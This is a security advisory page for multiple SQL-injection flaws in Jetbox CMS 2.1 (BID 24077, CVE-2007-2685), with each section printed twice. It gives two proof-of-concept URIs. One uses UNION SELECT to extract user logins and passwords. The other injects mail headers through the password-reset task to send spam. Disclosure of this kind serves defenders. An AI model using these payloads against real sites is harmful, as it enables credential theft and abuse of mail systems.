Jetbox CMS Multiple SQL Injection Vulnerabilities
BID:24077
Info
Jetbox CMS Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 24077 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-2685 |
| Remote: | Yes |
| Local: | No |
| Published: | May 21 2007 12:00AM |
| Updated: | May 07 2015 05:38PM |
| Credit: | Jesper Jurcenoks is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Jetbox Jetbox CMS 2.1 |
| Not Vulnerable: | |
Discussion
Jetbox CMS Multiple SQL Injection Vulnerabilities
Jetbox is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Jetbox 2.1 is vulnerable; other versions may also be affected.
Jetbox is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Jetbox 2.1 is vulnerable; other versions may also be affected.
Exploit / POC
Jetbox CMS Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/path//index.php?view=-1' UNION SELECT 1,CONCAT(`login`,'-',`user_password`),1,1,1,1,1,1,1,1,1,1 FROM `User` LIMIT 0,1%23
http://www.example.com/path//index.php?view=webuser&task=sendpw&login=-1' UNION SELECT 1,1,1,'[email protected]%0ABcc: [email protected], spam_address2 somedomain.com, [email protected], spam_addressNsomedomain.com%0ASubject: Some Spam Subject%0AFrom: [email protected]%0AMIME-Version: 1.0%0AContent-Type: multipart/mixed; boundary=Hacker;%0A%0A--Hacker%0ASome Spam Message%0A%0AContent-Type:text/html;name=any_file.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition: attachment%0A%0AHTML File%0A%0A--Hacker--%0AOther text will be hide',1 FROM `user` %23
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/path//index.php?view=-1' UNION SELECT 1,CONCAT(`login`,'-',`user_password`),1,1,1,1,1,1,1,1,1,1 FROM `User` LIMIT 0,1%23
http://www.example.com/path//index.php?view=webuser&task=sendpw&login=-1' UNION SELECT 1,1,1,'[email protected]%0ABcc: [email protected], spam_address2 somedomain.com, [email protected], spam_addressNsomedomain.com%0ASubject: Some Spam Subject%0AFrom: [email protected]%0AMIME-Version: 1.0%0AContent-Type: multipart/mixed; boundary=Hacker;%0A%0A--Hacker%0ASome Spam Message%0A%0AContent-Type:text/html;name=any_file.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition: attachment%0A%0AHTML File%0A%0A--Hacker--%0AOther text will be hide',1 FROM `user` %23
Solution / Fix
Jetbox CMS Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Jetbox CMS Multiple SQL Injection Vulnerabilities
References:
References: